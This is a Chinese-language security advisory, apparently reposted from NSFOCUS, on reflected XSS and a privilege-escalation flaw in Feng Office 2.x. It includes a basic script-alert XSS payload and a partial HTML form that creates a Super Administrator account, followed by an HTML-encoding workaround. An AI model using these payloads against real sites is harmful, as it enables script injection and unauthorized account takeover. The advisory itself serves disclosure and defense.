Feng Office跨站脚本执行和越权操作漏洞

发布日期:2012-11-22
更新日期:2012-11-25

受影响系统:
Feng Office Feng Office 2.x
描述:
--------------------------------------------------------------------------------
Feng Office是一个开源的在线协作系统,采用BS架构,运用php语言开发而成。

Feng Office 2.2.1及其他版本存在越权操作和跨站漏洞,恶意用户可利用这些漏洞绕过某些安全限制和执行脚本代码。

1)传递到index.php (当参数"a"和"c"的值是"search"时) 内"search_for"参数的输入没有正确过滤即返回给用户,导致用户在浏览站点时恶意HTML和脚本代码被执行。

2)在创建用户时,应用没有正确检查权限,导致有"Executive" 权限的用户可以越权创建用户。

<*来源:Ur0b0r0x
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Proof of Concept Video
?v=Q_B_5VkAVhU

# Expl0it/P0c/Xss ###################
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

# Expl0it/P0c/Privilege Escalation ###################
<input type="hidden" value="">
<input type="hidden" value="">
<label for="og_1353469580_283914profileFormFirstName">First name:     
<input type="text" value="poc" maxlength="50">
<label for="og_1353469580_283914profileFormSurName">Last name:     
<input type="text" value="poc2" maxlength="50">   
<label for="og_1353469580_283914profileFormEmail">Email address:</label>     
<input type="text" value="poctest@live.com" maxlength="100">
<div>
<label>Password:<input type="password">
<label>Repeat password:<input type="password">
<select>
<option value="1">Super Administrator</option>
<button tabindex="20000" type="submit" accesskey="s">Add Per<u>s</u>on</button>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 将search_for参数值在返回给用户前进行html编码。

厂商补丁:

Feng Office
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wydssj.html